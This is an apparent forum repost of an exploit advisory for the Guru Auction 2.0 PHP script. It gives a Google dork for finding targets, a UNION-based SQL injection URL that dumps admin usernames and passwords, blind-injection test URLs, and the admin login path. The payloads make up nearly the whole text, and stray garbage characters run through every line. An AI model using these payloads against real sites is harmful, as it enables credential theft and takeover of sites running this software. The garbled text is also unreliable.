Guru Auction 2.0 Multiple SQL Injection Vulnerabilities6 U# U& }* W! L6 `/ M4 u
6 }% I7 K7 |9 v& `7 C' w* w
作者 : v3n0m5 h/ ^0 y$ `8 L* g
应用 : Guru Auction 2.0
4 {1 R1 D$ ]; @Price : $49
/ L; @4 N% _ k" R/ q H6 P' fVendor : http://www.guruscript.com/
8 R3 }# M% T0 Z7 _$ jGoogle Dork : inurl:subcat.php?cate_id=4 K/ @4 X. {9 d- a) W
8 x y+ h& E( A: ]: {4 v; ^3 f' JSQLi p0c:( I" }( y: u% {9 L" i
~~~~~~~~~~
5 c, F& ]/ `: N Rhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--% f5 e/ o8 }# L/ `
5 `% w' V. Z# @4 F8 ?0 e
# Z) x6 J0 A4 H7 J4 a: |盲注 p0c:% `# K0 {! e/ o8 j
~~~~~~~~~~
) K" q4 s `2 }! i! {% uhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true2 o0 p U' A+ T( E! T/ q# F
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false3 i! w3 V2 y5 y% d/ b5 f& n
2 r# ?+ o* A! W5 g* J2 S) ]管理登录入口:
" v. d* K4 u- H/ g5 z. I. P~~~~~~~~~~! ^7 S5 _, z: x
http://domain.tld/[path]/admin/# x n1 t9 t, d. K
|
发表于 2012-12-31 09:24:05
收藏
支持
反对